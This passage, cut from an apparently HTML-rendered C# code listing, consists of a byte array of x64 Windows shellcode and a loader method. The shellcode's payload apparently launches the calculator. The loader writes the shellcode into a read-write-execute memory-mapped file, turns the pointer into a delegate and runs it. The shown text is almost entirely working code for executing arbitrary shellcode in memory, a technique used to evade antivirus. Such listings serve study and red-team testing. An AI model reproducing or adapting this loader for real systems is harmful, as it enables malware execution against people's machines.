class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0xac&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x61&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x7c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x02&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x2c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xed&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x51&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x42&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x80&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x88&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x85&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x74&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x67&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x18&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x44&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x49&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x56&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x34&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x88&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xac&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x38&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x75&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xf1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x03&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x24&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x08&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x45&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x39&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x75&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x44&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x24&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x49&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x66&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x44&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x49&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x04&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x88&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x59&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x59&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x83&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x59&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x57&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xba&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xba&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x6f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x87&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xbb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x2a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xba&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x95&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xbd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x9d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0xd5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x83&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x28&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x06&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x7c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x80&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xfb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x75&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x05&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xbb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x47&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x13&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x72&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x59&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x89&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xda&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x63&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x61&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x63&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;
               &lt;span class="p"&gt;};&lt;/span&gt;

           &lt;span class="n"&gt;MemoryMappedFile&lt;/span&gt; &lt;span class="n"&gt;mmf&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
           &lt;span class="n"&gt;MemoryMappedViewAccessor&lt;/span&gt; &lt;span class="n"&gt;viewaccessor&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

           &lt;span class="k"&gt;try&lt;/span&gt;
           &lt;span class="p"&gt;{&lt;/span&gt;
               &lt;span class="cm"&gt;/* The try block creates the MMF and assigns the RWE permissions
               The view accessor is created with matching permissions
               the shell code from GetShellMemAddr is written to MMF
               then the pointer is gained and a delegate is created to handle pointer value
               so that it can be passed in therms of the returned function */&lt;/span&gt;

               &lt;span class="n"&gt;mmf&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;MemoryMappedFile&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;CreateNew&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"__shellcode"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MemoryMappedFileAccess&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ReadWriteExecute&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
               &lt;span class="n"&gt;viewaccessor&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;mmf&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;CreateViewAccessor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MemoryMappedFileAccess&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ReadWriteExecute&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
               &lt;span class="n"&gt;viewaccessor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;WriteArray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
               &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;pointer&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;*)&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
               &lt;span class="n"&gt;viewaccessor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SafeMemoryMappedViewHandle&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;AcquirePointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;pointer&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
               &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;func&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;NewDelegate&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;Marshal&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;GetDelegateForFunctionPointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nf"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pointer&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="k"&gt;typeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;NewDelegate&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
               &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;func&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
           &lt;span class="p"&gt;}&lt;/span&gt;
           &lt;span class="k"&gt;catch&lt;/span&gt;
           &lt;span class="p"&gt;{&lt;/span&gt;
               &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
           &lt;span class="p"&gt;}&lt;/span&gt;
           &lt;span class="k"&gt;finally&lt;/span&gt; &lt;span class="c1"&gt;// You should always clean up after yourself :)&lt;/span&gt;
           &lt;span class="p"&gt;{&lt;/span&gt;
               &lt;span class="n"&gt;viewaccessor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Dispose&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
               &lt;span class="n"&gt;mmf&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Dispose&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
           &lt;span class="p"&gt;}&lt;/span&gt;
       &lt;span class="p"&gt;}&lt;/span&gt;

